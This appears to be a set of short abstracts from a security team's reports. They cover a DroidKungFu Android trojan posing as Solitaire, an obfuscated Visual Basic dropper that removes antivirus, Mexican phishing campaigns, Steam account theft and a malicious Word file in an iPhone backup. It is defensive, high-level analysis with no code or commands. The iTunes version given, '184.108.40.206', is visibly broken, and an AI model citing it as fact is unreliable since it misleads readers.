The analyzed sample is a trojan that pretends to be an application to play Solitaire while doing other background activities without the user’s consent, such as exploiting vulnerabilities and installing additional applications or unwanted advertisements (adware). This trojan belongs to the DroidKungFu malware family, detected on 2011 and that started affecting applications in China. The DroidKungFu variants have two important characteristics: they use exploits to escalate privileges (known as RageAgainstTheCage and Exploid) and these are ciphered with AES. Its main actions are: collecting information about the device to send it to remote servers, exploiting vulnerabilities to root the device, install other applications and receive instructions of its C&C (although this functionality could not be researched because the domains were down).
Out of all the samples received during the last few weeks, the Visual Basic scripts (.vbs or .vbe) are the ones who caught our attention. In this report, we analyze a Visual Basic file that was coded with a legitimate Windows program to hinder its analysis. The analyzed sample is the first infection stage and its purpose is to download and, in some cases, assure persistence of additional modules or updates of the trojan; in addition to uninstalling the security software used in the computer (such as antivirus or banking plugins) and creating firewall rules to block the network traffic related to such executables in case the uninstall fails.
As mentioned on the first statistics report of phishing and malware, it is important to show the most common cases to alert users and reduce the number of people affected.
During this trimester, some of the most interesting phishing campaigns were related to the Mexican Service Tax Administration (Servicio de Administración Tributaria, SAT) and with .cab files sent as attachments. There was also an increase in the amount of fake Banamex emails and the appearance of fake emails of Banorte, Netflix, WhatsApp and CFE (Federal Electricity Commission in Mexico), which were not observed during the first statistics report. Another notable characteristic is that phishing campaigns have opted to include two links, one for users and one for enterprises, and each redirects to different phishing sites. As for malware, the most common type is the malicious Word document.
During the last few months, users of the popular videogames distribution platform called Steam have been affected by several fake login websites and chat messages with links that redirect to malware downloads which, after executed, steal the file that allow attackers to access the account without having the login credentials.
Malicious programs can get to our devices in many ways; one of them is through the backup files of our mobile devices. And even though they do not present a threat due to its location and format, it is important to know why and how it happens. On this report, we analyze a backup up file of an iPhone 4S with iOS 8.2, that was detected as a threat by Microsoft Security essentials. The version of iTunes used to create the backup was the 184.108.40.206. The file detected was a malicious Word document sent to the user through email.